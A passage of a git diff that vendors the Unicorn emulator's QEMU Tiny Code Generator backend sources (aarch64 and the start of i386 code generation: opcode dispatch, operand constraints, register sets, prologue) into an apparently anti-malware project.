a1); + break; + case INDEX_op_remu_i64: + case INDEX_op_remu_i32: + tcg_out_insn(s, 3508, UDIV, ext, TCG_REG_TMP, a1, a2); + tcg_out_insn(s, 3509, MSUB, ext, a0, TCG_REG_TMP, a2, a1); + break; + + case INDEX_op_shl_i64: + case INDEX_op_shl_i32: + if (c2) { + tcg_out_shl(s, ext, a0, a1, a2); + } else { + tcg_out_insn(s, 3508, LSLV, ext, a0, a1, a2); + } + break; + + case INDEX_op_shr_i64: + case INDEX_op_shr_i32: + if (c2) { + tcg_out_shr(s, ext, a0, a1, a2); + } else { + tcg_out_insn(s, 3508, LSRV, ext, a0, a1, a2); + } + break; + + case INDEX_op_sar_i64: + case INDEX_op_sar_i32: + if (c2) { + tcg_out_sar(s, ext, a0, a1, a2); + } else { + tcg_out_insn(s, 3508, ASRV, ext, a0, a1, a2); + } + break; + + case INDEX_op_rotr_i64: + case INDEX_op_rotr_i32: + if (c2) { + tcg_out_rotr(s, ext, a0, a1, a2); + } else { + tcg_out_insn(s, 3508, RORV, ext, a0, a1, a2); + } + break; + + case INDEX_op_rotl_i64: + case INDEX_op_rotl_i32: + if (c2) { + tcg_out_rotl(s, ext, a0, a1, a2); + } else { + tcg_out_insn(s, 3502, SUB, 0, TCG_REG_TMP, TCG_REG_XZR, a2); + tcg_out_insn(s, 3508, RORV, ext, a0, a1, TCG_REG_TMP); + } + break; + + case INDEX_op_brcond_i32: + a1 = (int32_t)a1; + /* FALLTHRU */ + case INDEX_op_brcond_i64: + tcg_out_brcond(s, ext, a2, a0, a1, const_args[1], args[3]); + break; + + case INDEX_op_setcond_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_setcond_i64: + tcg_out_cmp(s, ext, a1, a2, c2); + /* Use CSET alias of CSINC Wd, WZR, WZR, invert(cond). */ + tcg_out_insn(s, 3506, CSINC, TCG_TYPE_I32, a0, TCG_REG_XZR, + TCG_REG_XZR, tcg_invert_cond(args[3])); + break; + + case INDEX_op_movcond_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_movcond_i64: + tcg_out_cmp(s, ext, a1, a2, c2); + tcg_out_insn(s, 3506, CSEL, ext, a0, REG0(3), REG0(4), args[5]); + break; + + case INDEX_op_qemu_ld_i32: + case INDEX_op_qemu_ld_i64: + tcg_out_qemu_ld(s, a0, a1, a2, ext, args[3]); + break; + case INDEX_op_qemu_st_i32: + case INDEX_op_qemu_st_i64: + tcg_out_qemu_st(s, REG0(0), a1, a2, args[3]); + break; + + case INDEX_op_bswap64_i64: + tcg_out_rev64(s, a0, a1); + break; + case INDEX_op_bswap32_i64: + case INDEX_op_bswap32_i32: + tcg_out_rev32(s, a0, a1); + break; + case INDEX_op_bswap16_i64: + case INDEX_op_bswap16_i32: + tcg_out_rev16(s, a0, a1); + break; + + case INDEX_op_ext8s_i64: + case INDEX_op_ext8s_i32: + tcg_out_sxt(s, ext, MO_8, a0, a1); + break; + case INDEX_op_ext16s_i64: + case INDEX_op_ext16s_i32: + tcg_out_sxt(s, ext, MO_16, a0, a1); + break; + case INDEX_op_ext32s_i64: + tcg_out_sxt(s, TCG_TYPE_I64, MO_32, a0, a1); + break; + case INDEX_op_ext8u_i64: + case INDEX_op_ext8u_i32: + tcg_out_uxt(s, MO_8, a0, a1); + break; + case INDEX_op_ext16u_i64: + case INDEX_op_ext16u_i32: + tcg_out_uxt(s, MO_16, a0, a1); + break; + case INDEX_op_ext32u_i64: + tcg_out_movr(s, TCG_TYPE_I32, a0, a1); + break; + + case INDEX_op_deposit_i64: + case INDEX_op_deposit_i32: + tcg_out_dep(s, ext, a0, REG0(2), args[3], args[4]); + break; + + case INDEX_op_add2_i32: + tcg_out_addsub2(s, TCG_TYPE_I32, a0, a1, REG0(2), REG0(3), + (int32_t)args[4], args[5], const_args[4], + const_args[5], false); + break; + case INDEX_op_add2_i64: + tcg_out_addsub2(s, TCG_TYPE_I64, a0, a1, REG0(2), REG0(3), args[4], + args[5], const_args[4], const_args[5], false); + break; + case INDEX_op_sub2_i32: + tcg_out_addsub2(s, TCG_TYPE_I32, a0, a1, REG0(2), REG0(3), + (int32_t)args[4], args[5], const_args[4], + const_args[5], true); + break; + case INDEX_op_sub2_i64: + tcg_out_addsub2(s, TCG_TYPE_I64, a0, a1, REG0(2), REG0(3), args[4], + args[5], const_args[4], const_args[5], true); + break; + + case INDEX_op_muluh_i64: + tcg_out_insn(s, 3508, UMULH, TCG_TYPE_I64, a0, a1, a2); + break; + case INDEX_op_mulsh_i64: + tcg_out_insn(s, 3508, SMULH, TCG_TYPE_I64, a0, a1, a2); + break; + + case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ + case INDEX_op_mov_i64: + case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ + case INDEX_op_movi_i64: + case INDEX_op_call: /* Always emitted via tcg_out_call. */ + default: + tcg_abort(); + } + +#undef REG0 +} + +static const TCGTargetOpDef aarch64_op_defs[] = { + { INDEX_op_exit_tb, { } }, + { INDEX_op_goto_tb, { } }, + { INDEX_op_br, { } }, + + { INDEX_op_ld8u_i32, { "r", "r" } }, + { INDEX_op_ld8s_i32, { "r", "r" } }, + { INDEX_op_ld16u_i32, { "r", "r" } }, + { INDEX_op_ld16s_i32, { "r", "r" } }, + { INDEX_op_ld_i32, { "r", "r" } }, + { INDEX_op_ld8u_i64, { "r", "r" } }, + { INDEX_op_ld8s_i64, { "r", "r" } }, + { INDEX_op_ld16u_i64, { "r", "r" } }, + { INDEX_op_ld16s_i64, { "r", "r" } }, + { INDEX_op_ld32u_i64, { "r", "r" } }, + { INDEX_op_ld32s_i64, { "r", "r" } }, + { INDEX_op_ld_i64, { "r", "r" } }, + + { INDEX_op_st8_i32, { "rZ", "r" } }, + { INDEX_op_st16_i32, { "rZ", "r" } }, + { INDEX_op_st_i32, { "rZ", "r" } }, + { INDEX_op_st8_i64, { "rZ", "r" } }, + { INDEX_op_st16_i64, { "rZ", "r" } }, + { INDEX_op_st32_i64, { "rZ", "r" } }, + { INDEX_op_st_i64, { "rZ", "r" } }, + + { INDEX_op_add_i32, { "r", "r", "rA" } }, + { INDEX_op_add_i64, { "r", "r", "rA" } }, + { INDEX_op_sub_i32, { "r", "r", "rA" } }, + { INDEX_op_sub_i64, { "r", "r", "rA" } }, + { INDEX_op_mul_i32, { "r", "r", "r" } }, + { INDEX_op_mul_i64, { "r", "r", "r" } }, + { INDEX_op_div_i32, { "r", "r", "r" } }, + { INDEX_op_div_i64, { "r", "r", "r" } }, + { INDEX_op_divu_i32, { "r", "r", "r" } }, + { INDEX_op_divu_i64, { "r", "r", "r" } }, + { INDEX_op_rem_i32, { "r", "r", "r" } }, + { INDEX_op_rem_i64, { "r", "r", "r" } }, + { INDEX_op_remu_i32, { "r", "r", "r" } }, + { INDEX_op_remu_i64, { "r", "r", "r" } }, + { INDEX_op_and_i32, { "r", "r", "rL" } }, + { INDEX_op_and_i64, { "r", "r", "rL" } }, + { INDEX_op_or_i32, { "r", "r", "rL" } }, + { INDEX_op_or_i64, { "r", "r", "rL" } }, + { INDEX_op_xor_i32, { "r", "r", "rL" } }, + { INDEX_op_xor_i64, { "r", "r", "rL" } }, + { INDEX_op_andc_i32, { "r", "r", "rL" } }, + { INDEX_op_andc_i64, { "r", "r", "rL" } }, + { INDEX_op_orc_i32, { "r", "r", "rL" } }, + { INDEX_op_orc_i64, { "r", "r", "rL" } }, + { INDEX_op_eqv_i32, { "r", "r", "rL" } }, + { INDEX_op_eqv_i64, { "r", "r", "rL" } }, + + { INDEX_op_neg_i32, { "r", "r" } }, + { INDEX_op_neg_i64, { "r", "r" } }, + { INDEX_op_not_i32, { "r", "r" } }, + { INDEX_op_not_i64, { "r", "r" } }, + + { INDEX_op_shl_i32, { "r", "r", "ri" } }, + { INDEX_op_shr_i32, { "r", "r", "ri" } }, + { INDEX_op_sar_i32, { "r", "r", "ri" } }, + { INDEX_op_rotl_i32, { "r", "r", "ri" } }, + { INDEX_op_rotr_i32, { "r", "r", "ri" } }, + { INDEX_op_shl_i64, { "r", "r", "ri" } }, + { INDEX_op_shr_i64, { "r", "r", "ri" } }, + { INDEX_op_sar_i64, { "r", "r", "ri" } }, + { INDEX_op_rotl_i64, { "r", "r", "ri" } }, + { INDEX_op_rotr_i64, { "r", "r", "ri" } }, + + { INDEX_op_brcond_i32, { "r", "rA" } }, + { INDEX_op_brcond_i64, { "r", "rA" } }, + { INDEX_op_setcond_i32, { "r", "r", "rA" } }, + { INDEX_op_setcond_i64, { "r", "r", "rA" } }, + { INDEX_op_movcond_i32, { "r", "r", "rA", "rZ", "rZ" } }, + { INDEX_op_movcond_i64, { "r", "r", "rA", "rZ", "rZ" } }, + + { INDEX_op_qemu_ld_i32, { "r", "l" } }, + { INDEX_op_qemu_ld_i64, { "r", "l" } }, + { INDEX_op_qemu_st_i32, { "lZ", "l" } }, + { INDEX_op_qemu_st_i64, { "lZ", "l" } }, + + { INDEX_op_bswap16_i32, { "r", "r" } }, + { INDEX_op_bswap32_i32, { "r", "r" } }, + { INDEX_op_bswap16_i64, { "r", "r" } }, + { INDEX_op_bswap32_i64, { "r", "r" } }, + { INDEX_op_bswap64_i64, { "r", "r" } }, + + { INDEX_op_ext8s_i32, { "r", "r" } }, + { INDEX_op_ext16s_i32, { "r", "r" } }, + { INDEX_op_ext8u_i32, { "r", "r" } }, + { INDEX_op_ext16u_i32, { "r", "r" } }, + + { INDEX_op_ext8s_i64, { "r", "r" } }, + { INDEX_op_ext16s_i64, { "r", "r" } }, + { INDEX_op_ext32s_i64, { "r", "r" } }, + { INDEX_op_ext8u_i64, { "r", "r" } }, + { INDEX_op_ext16u_i64, { "r", "r" } }, + { INDEX_op_ext32u_i64, { "r", "r" } }, + + { INDEX_op_deposit_i32, { "r", "0", "rZ" } }, + { INDEX_op_deposit_i64, { "r", "0", "rZ" } }, + + { INDEX_op_add2_i32, { "r", "r", "rZ", "rZ", "rA", "rMZ" } }, + { INDEX_op_add2_i64, { "r", "r", "rZ", "rZ", "rA", "rMZ" } }, + { INDEX_op_sub2_i32, { "r", "r", "rZ", "rZ", "rA", "rMZ" } }, + { INDEX_op_sub2_i64, { "r", "r", "rZ", "rZ", "rA", "rMZ" } }, + + { INDEX_op_muluh_i64, { "r", "r", "r" } }, + { INDEX_op_mulsh_i64, { "r", "r", "r" } }, + + { -1 }, +}; + +static void tcg_target_init(TCGContext *s) +{ + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I32], 0, 0xffffffff); + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I64], 0, 0xffffffff); + + tcg_regset_set32(s->tcg_target_call_clobber_regs, 0, + (1 << TCG_REG_X0) | (1 << TCG_REG_X1) | + (1 << TCG_REG_X2) | (1 << TCG_REG_X3) | + (1 << TCG_REG_X4) | (1 << TCG_REG_X5) | + (1 << TCG_REG_X6) | (1 << TCG_REG_X7) | + (1 << TCG_REG_X8) | (1 << TCG_REG_X9) | + (1 << TCG_REG_X10) | (1 << TCG_REG_X11) | + (1 << TCG_REG_X12) | (1 << TCG_REG_X13) | + (1 << TCG_REG_X14) | (1 << TCG_REG_X15) | + (1 << TCG_REG_X16) | (1 << TCG_REG_X17) | + (1 << TCG_REG_X18) | (1 << TCG_REG_X30)); + + tcg_regset_clear(s->reserved_regs); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_SP); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_FP); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_TMP); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_X18); /* platform register */ + + tcg_add_target_add_op_defs(s, aarch64_op_defs); +} + +/* Saving pairs: (X19, X20) .. (X27, X28), (X29(fp), X30(lr)). */ +#define PUSH_SIZE ((30 - 19 + 1) * 8) + +#define FRAME_SIZE \ + ((PUSH_SIZE \ + + TCG_STATIC_CALL_ARGS_SIZE \ + + CPU_TEMP_BUF_NLONGS * sizeof(long) \ + + TCG_TARGET_STACK_ALIGN - 1) \ + & ~(TCG_TARGET_STACK_ALIGN - 1)) + +/* We're expecting a 2 byte uleb128 encoded value. */ +QEMU_BUILD_BUG_ON(FRAME_SIZE >= (1 << 14)); + +/* We're expecting to use a single ADDI insn. */ +QEMU_BUILD_BUG_ON(FRAME_SIZE - PUSH_SIZE > 0xfff); + +static void tcg_target_qemu_prologue(TCGContext *s) +{ + TCGReg r; + + /* Push (FP, LR) and allocate space for all saved registers. */ + tcg_out_insn(s, 3314, STP, TCG_REG_FP, TCG_REG_LR, + TCG_REG_SP, -PUSH_SIZE, 1, 1); + + /* Set up frame pointer for canonical unwinding. */ + tcg_out_movr_sp(s, TCG_TYPE_I64, TCG_REG_FP, TCG_REG_SP); + + /* Store callee-preserved regs x19..x28. */ + for (r = TCG_REG_X19; r <= TCG_REG_X27; r += 2) { + int ofs = (r - TCG_REG_X19 + 2) * 8; + tcg_out_insn(s, 3314, STP, r, r + 1, TCG_REG_SP, ofs, 1, 0); + } + + /* Make stack space for TCG locals. */ + tcg_out_insn(s, 3401, SUBI, TCG_TYPE_I64, TCG_REG_SP, TCG_REG_SP, + FRAME_SIZE - PUSH_SIZE); + + /* Inform TCG about how to find TCG locals with register, offset, size. */ + tcg_set_frame(s, TCG_REG_SP, TCG_STATIC_CALL_ARGS_SIZE, + CPU_TEMP_BUF_NLONGS * sizeof(long)); + +#if defined(CONFIG_USE_GUEST_BASE) + if (GUEST_BASE) { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_GUEST_BASE, GUEST_BASE); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_GUEST_BASE); + } +#endif + + tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); + tcg_out_insn(s, 3207, BR, tcg_target_call_iarg_regs[1]); + + tb_ret_addr = s->code_ptr; + + /* Remove TCG locals stack space. */ + tcg_out_insn(s, 3401, ADDI, TCG_TYPE_I64, TCG_REG_SP, TCG_REG_SP, + FRAME_SIZE - PUSH_SIZE); + + /* Restore registers x19..x28. */ + for (r = TCG_REG_X19; r <= TCG_REG_X27; r += 2) { + int ofs = (r - TCG_REG_X19 + 2) * 8; + tcg_out_insn(s, 3314, LDP, r, r + 1, TCG_REG_SP, ofs, 1, 0); + } + + /* Pop (FP, LR), restore SP to previous frame. */ + tcg_out_insn(s, 3314, LDP, TCG_REG_FP, TCG_REG_LR, + TCG_REG_SP, PUSH_SIZE, 0, 1); + tcg_out_insn(s, 3207, RET, TCG_REG_LR); +} + +#define ELF_HOST_MACHINE EM_AARCH64 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/aarch64/tcg-target.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/aarch64/tcg-target.h new file mode 100644 index 0000000..60c7493 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/aarch64/tcg-target.h @@ -0,0 +1,107 @@ +/* + * Initial TCG Implementation for aarch64 + * + * Copyright (c) 2013 Huawei Technologies Duesseldorf GmbH + * Written by Claudio Fontana + * + * This work is licensed under the terms of the GNU GPL, version 2 or + * (at your option) any later version. + * + * See the COPYING file in the top-level directory for details. + */ + +#ifndef TCG_TARGET_AARCH64 +#define TCG_TARGET_AARCH64 1 + +#define TCG_TARGET_INSN_UNIT_SIZE 4 +#undef TCG_TARGET_STACK_GROWSUP + +typedef enum { + TCG_REG_X0, TCG_REG_X1, TCG_REG_X2, TCG_REG_X3, + TCG_REG_X4, TCG_REG_X5, TCG_REG_X6, TCG_REG_X7, + TCG_REG_X8, TCG_REG_X9, TCG_REG_X10, TCG_REG_X11, + TCG_REG_X12, TCG_REG_X13, TCG_REG_X14, TCG_REG_X15, + TCG_REG_X16, TCG_REG_X17, TCG_REG_X18, TCG_REG_X19, + TCG_REG_X20, TCG_REG_X21, TCG_REG_X22, TCG_REG_X23, + TCG_REG_X24, TCG_REG_X25, TCG_REG_X26, TCG_REG_X27, + TCG_REG_X28, TCG_REG_X29, TCG_REG_X30, + + /* X31 is either the stack pointer or zero, depending on context. */ + TCG_REG_SP = 31, + TCG_REG_XZR = 31, + + /* Aliases. */ + TCG_REG_FP = TCG_REG_X29, + TCG_REG_LR = TCG_REG_X30, + TCG_AREG0 = TCG_REG_X19, +} TCGReg; + +#define TCG_TARGET_NB_REGS 32 + +/* used for function call generation */ +#define TCG_REG_CALL_STACK TCG_REG_SP +#define TCG_TARGET_STACK_ALIGN 16 +#define TCG_TARGET_CALL_ALIGN_ARGS 1 +#define TCG_TARGET_CALL_STACK_OFFSET 0 + +/* optional instructions */ +#define TCG_TARGET_HAS_div_i32 1 +#define TCG_TARGET_HAS_rem_i32 1 +#define TCG_TARGET_HAS_ext8s_i32 1 +#define TCG_TARGET_HAS_ext16s_i32 1 +#define TCG_TARGET_HAS_ext8u_i32 1 +#define TCG_TARGET_HAS_ext16u_i32 1 +#define TCG_TARGET_HAS_bswap16_i32 1 +#define TCG_TARGET_HAS_bswap32_i32 1 +#define TCG_TARGET_HAS_not_i32 1 +#define TCG_TARGET_HAS_neg_i32 1 +#define TCG_TARGET_HAS_rot_i32 1 +#define TCG_TARGET_HAS_andc_i32 1 +#define TCG_TARGET_HAS_orc_i32 1 +#define TCG_TARGET_HAS_eqv_i32 1 +#define TCG_TARGET_HAS_nand_i32 0 +#define TCG_TARGET_HAS_nor_i32 0 +#define TCG_TARGET_HAS_deposit_i32 1 +#define TCG_TARGET_HAS_movcond_i32 1 +#define TCG_TARGET_HAS_add2_i32 1 +#define TCG_TARGET_HAS_sub2_i32 1 +#define TCG_TARGET_HAS_mulu2_i32 0 +#define TCG_TARGET_HAS_muls2_i32 0 +#define TCG_TARGET_HAS_muluh_i32 0 +#define TCG_TARGET_HAS_mulsh_i32 0 +#define TCG_TARGET_HAS_trunc_shr_i32 0 + +#define TCG_TARGET_HAS_div_i64 1 +#define TCG_TARGET_HAS_rem_i64 1 +#define TCG_TARGET_HAS_ext8s_i64 1 +#define TCG_TARGET_HAS_ext16s_i64 1 +#define TCG_TARGET_HAS_ext32s_i64 1 +#define TCG_TARGET_HAS_ext8u_i64 1 +#define TCG_TARGET_HAS_ext16u_i64 1 +#define TCG_TARGET_HAS_ext32u_i64 1 +#define TCG_TARGET_HAS_bswap16_i64 1 +#define TCG_TARGET_HAS_bswap32_i64 1 +#define TCG_TARGET_HAS_bswap64_i64 1 +#define TCG_TARGET_HAS_not_i64 1 +#define TCG_TARGET_HAS_neg_i64 1 +#define TCG_TARGET_HAS_rot_i64 1 +#define TCG_TARGET_HAS_andc_i64 1 +#define TCG_TARGET_HAS_orc_i64 1 +#define TCG_TARGET_HAS_eqv_i64 1 +#define TCG_TARGET_HAS_nand_i64 0 +#define TCG_TARGET_HAS_nor_i64 0 +#define TCG_TARGET_HAS_deposit_i64 1 +#define TCG_TARGET_HAS_movcond_i64 1 +#define TCG_TARGET_HAS_add2_i64 1 +#define TCG_TARGET_HAS_sub2_i64 1 +#define TCG_TARGET_HAS_mulu2_i64 0 +#define TCG_TARGET_HAS_muls2_i64 0 +#define TCG_TARGET_HAS_muluh_i64 1 +#define TCG_TARGET_HAS_mulsh_i64 1 + +static inline void flush_icache_range(uintptr_t start, uintptr_t stop) +{ + __builtin___clear_cache((char *)start, (char *)stop); +} + +#endif /* TCG_TARGET_AARCH64 */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/i386/tcg-target.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/i386/tcg-target.c new file mode 100644 index 0000000..fefe85a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/i386/tcg-target.c @@ -0,0 +1,2471 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "tcg-be-ldst.h" + +#ifndef NDEBUG +static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { +#if TCG_TARGET_REG_BITS == 64 + "%rax", "%rcx", "%rdx", "%rbx", "%rsp", "%rbp", "%rsi", "%rdi", + "%r8", "%r9", "%r10", "%r11", "%r12", "%r13", "%r14", "%r15", +#else + "%eax", "%ecx", "%edx", "%ebx", "%esp", "%ebp", "%esi", "%edi", +#endif +}; +#endif + +static const int tcg_target_reg_alloc_order[] = { +#if TCG_TARGET_REG_BITS == 64 + TCG_REG_RBP, + TCG_REG_RBX, + TCG_REG_R12, + TCG_REG_R13, + TCG_REG_R14, + TCG_REG_R15, + TCG_REG_R10, + TCG_REG_R11, + TCG_REG_R9, + TCG_REG_R8, + TCG_REG_RCX, + TCG_REG_RDX, + TCG_REG_RSI, + TCG_REG_RDI, + TCG_REG_RAX, +#else + TCG_REG_EBX, + TCG_REG_ESI, + TCG_REG_EDI, + TCG_REG_EBP, + TCG_REG_ECX, + TCG_REG_EDX, + TCG_REG_EAX, +#endif +}; + +static const int tcg_target_call_iarg_regs[] = { +#if TCG_TARGET_REG_BITS == 64 +#if (defined(_WIN64) || defined(__CYGWIN__)) + TCG_REG_RCX, + TCG_REG_RDX, +#else + TCG_REG_RDI, + TCG_REG_RSI, + TCG_REG_RDX, + TCG_REG_RCX, +#endif + TCG_REG_R8, + TCG_REG_R9, +#else +#ifdef _MSC_VER +#ifdef _UC_MSVC_ARRAY_DUMMY +#error "DUP DEF _UC_MSVC_ARRAY_DUMMY" +#endif +#define _UC_MSVC_ARRAY_DUMMY + /* 32 bit mode uses stack based calling convention (GCC default). + We add a dummy value here for MSVC compatibility for the error: + "error C2466: cannot allocate an array of constant size 0" + The "tcg_target_call_iarg_regs" array is not accessed when + TCG_TARGET_REG_BITS == 32 + */ + 0, +#endif +#endif +}; + +static const int tcg_target_call_oarg_regs[] = { + TCG_REG_EAX, +#if TCG_TARGET_REG_BITS == 32 + TCG_REG_EDX +#endif +}; + +/* Constants we accept. */ +#define TCG_CT_CONST_S32 0x100 +#define TCG_CT_CONST_U32 0x200 +#define TCG_CT_CONST_I32 0x400 + +/* Registers used with L constraint, which are the first argument + registers on x86_64, and two random call clobbered registers on + i386. */ +#if TCG_TARGET_REG_BITS == 64 +# define TCG_REG_L0 tcg_target_call_iarg_regs[0] +# define TCG_REG_L1 tcg_target_call_iarg_regs[1] +#else +# define TCG_REG_L0 TCG_REG_EAX +# define TCG_REG_L1 TCG_REG_EDX +#endif + +/* The host compiler should supply to enable runtime features + detection, as we're not going to go so far as our own inline assembly. + If not available, default values will be assumed. */ +#if defined(CONFIG_CPUID_H) +#ifdef _MSC_VER +#include +/* %ecx */ +#define bit_MOVBE (1 << 22) +/* %edx */ +#define bit_CMOV (1 << 15) +/* Extended Features (%eax == 7) */ +#define bit_BMI (1 << 3) +#define bit_BMI2 (1 << 8) +#else +#include +#endif +#endif + +/* For 32-bit, we are going to attempt to determine at runtime whether cmov + is available. */ +#if TCG_TARGET_REG_BITS == 64 +# define have_cmov 1 +#elif defined(CONFIG_CPUID_H) && defined(bit_CMOV) +static bool have_cmov; +#else +# define have_cmov 0 +#endif + +/* We need this symbol in tcg-target.h, and we can't properly conditionalize + it there. Therefore we always define the variable. */ +bool have_bmi1; + +#if defined(CONFIG_CPUID_H) && defined(bit_BMI2) +static bool have_bmi2; +#else +static bool have_bmi2 = 0; +#endif + +static void patch_reloc(tcg_insn_unit *code_ptr, int type, + intptr_t value, intptr_t addend) +{ + value += addend; + switch(type) { + case R_386_PC32: + value -= (uintptr_t)code_ptr; + if (value != (int32_t)value) { + tcg_abort(); + } + tcg_patch32(code_ptr, value); + break; + case R_386_PC8: + value -= (uintptr_t)code_ptr; + if (value != (int8_t)value) { + tcg_abort(); + } + tcg_patch8(code_ptr, value); + break; + default: + tcg_abort(); + } +} + +/* parse target specific constraints */ +static int target_parse_constraint(TCGArgConstraint *ct, const char **pct_str) +{ + const char *ct_str; + + ct_str = *pct_str; + switch(ct_str[0]) { + case 'a': + ct->ct |= TCG_CT_REG; + tcg_regset_set_reg(ct->u.regs, TCG_REG_EAX); + break; + case 'b': + ct->ct |= TCG_CT_REG; + tcg_regset_set_reg(ct->u.regs, TCG_REG_EBX); + break; + case 'c': + case_c: + ct->ct |= TCG_CT_REG; + tcg_regset_set_reg(ct->u.regs, TCG_REG_ECX); + break; + case 'd': + ct->ct |= TCG_CT_REG; + tcg_regset_set_reg(ct->u.regs, TCG_REG_EDX); + break; + case 'S': + ct->ct |= TCG_CT_REG; + tcg_regset_set_reg(ct->u.regs, TCG_REG_ESI); + break; + case 'D': + ct->ct |= TCG_CT_REG; + tcg_regset_set_reg(ct->u.regs, TCG_REG_EDI); + break; + case 'q': + ct->ct |= TCG_CT_REG; + if (TCG_TARGET_REG_BITS == 64) { + tcg_regset_set32(ct->u.regs, 0, 0xffff); + } else { + tcg_regset_set32(ct->u.regs, 0, 0xf); + } + break; + case 'Q': + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xf); + break; + case 'r': + case_r: + ct->ct |= TCG_CT_REG; + if (TCG_TARGET_REG_BITS == 64) { + tcg_regset_set32(ct->u.regs, 0, 0xffff); + } else { + tcg_regset_set32(ct->u.regs, 0, 0xff); + } + break; + case 'C': + /* With SHRX et al, we need not use ECX as shift count register. */ + if (have_bmi2) { + goto case_r; + } else { + goto case_c; + } + + /* qemu_ld/st address constraint */ + case 'L': + ct->ct |= TCG_CT_REG; + if (TCG_TARGET_REG_BITS == 64) { + tcg_regset_set32(ct->u.regs, 0, 0xffff); + } else { + tcg_regset_set32(ct->u.regs, 0, 0xff); + } + tcg_regset_reset_reg(ct->u.regs, TCG_REG_L0); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_L1); + break; + + case 'e': + ct->ct |= TCG_CT_CONST_S32; + break; + case 'Z': + ct->ct |= TCG_CT_CONST_U32; + break; + case 'I': + ct->ct |= TCG_CT_CONST_I32; + break; + + default: + return -1; + } + ct_str++; + *pct_str = ct_str; + return 0; +} + +/* test if a constant matches the constraint */ +static inline int tcg_target_const_match(tcg_target_long val, TCGType type, + const TCGArgConstraint *arg_ct) +{ + int ct = arg_ct->ct; + if (ct & TCG_CT_CONST) { + return 1; + } + if ((ct & TCG_CT_CONST_S32) && val == (int32_t)val) { + return 1; + } + if ((ct & TCG_CT_CONST_U32) && val == (uint32_t)val) { + return 1; + } + if ((ct & TCG_CT_CONST_I32) && ~val == (int32_t)~val) { + return 1; + } + return 0; +} + +#if TCG_TARGET_REG_BITS == 64 +# define LOWREGMASK(x) ((x) & 7) +#else +# define LOWREGMASK(x) (x) +#endif + +#define P_EXT 0x100 /* 0x0f opcode prefix */ +#define P_EXT38 0x200 /* 0x0f 0x38 opcode prefix */ +#define P_DATA16 0x400 /* 0x66 opcode prefix */ +#if TCG_TARGET_REG_BITS == 64 +# define P_ADDR32 0x800 /* 0x67 opcode prefix */ +# define P_REXW 0x1000 /* Set REX.W = 1 */ +# define P_REXB_R 0x2000 /* REG field as byte register */ +# define P_REXB_RM 0x4000 /* R/M field as byte register */ +# define P_GS 0x8000 /* gs segment override */ +#else +# define P_ADDR32 0 +# define P_REXW 0 +# define P_REXB_R 0 +# define P_REXB_RM 0 +# define P_GS 0 +#endif +#define P_SIMDF3 0x10000 /* 0xf3 opcode prefix */ +#define P_SIMDF2 0x20000 /* 0xf2 opcode prefix */ + +#define OPC_ARITH_EvIz (0x81) +#define OPC_ARITH_EvIb (0x83) +#define OPC_ARITH_GvEv (0x03) /* ... plus (ARITH_FOO << 3) */ +#define OPC_ANDN (0xf2 | P_EXT38) +#define OPC_ADD_GvEv (OPC_ARITH_GvEv | (ARITH_ADD << 3)) +#define OPC_BSWAP (0xc8 | P_EXT) +#define OPC_CALL_Jz (0xe8) +#define OPC_CMOVCC (0x40 | P_EXT) /* ... plus condition code */ +#define OPC_CMP_GvEv (OPC_ARITH_GvEv | (ARITH_CMP << 3)) +#define OPC_DEC_r32 (0x48) +#define OPC_IMUL_GvEv (0xaf | P_EXT) +#define OPC_IMUL_GvEvIb (0x6b) +#define OPC_IMUL_GvEvIz (0x69) +#define OPC_INC_r32 (0x40) +#define OPC_JCC_long (0x80 | P_EXT) /* ... plus condition code */ +#define OPC_JCC_short (0x70) /* ... plus condition code */ +#define OPC_JMP_long (0xe9) +#define OPC_JMP_short (0xeb) +#define OPC_LEA (0x8d) +#define OPC_MOVB_EvGv (0x88) /* stores, more or less */ +#define OPC_MOVL_EvGv (0x89) /* stores, more or less */ +#define OPC_MOVL_GvEv (0x8b) /* loads, more or less */ +#define OPC_MOVB_EvIz (0xc6) +#define OPC_MOVL_EvIz (0xc7) +#define OPC_MOVL_Iv (0xb8) +#define OPC_MOVBE_GyMy (0xf0 | P_EXT38) +#define OPC_MOVBE_MyGy (0xf1 | P_EXT38) +#define 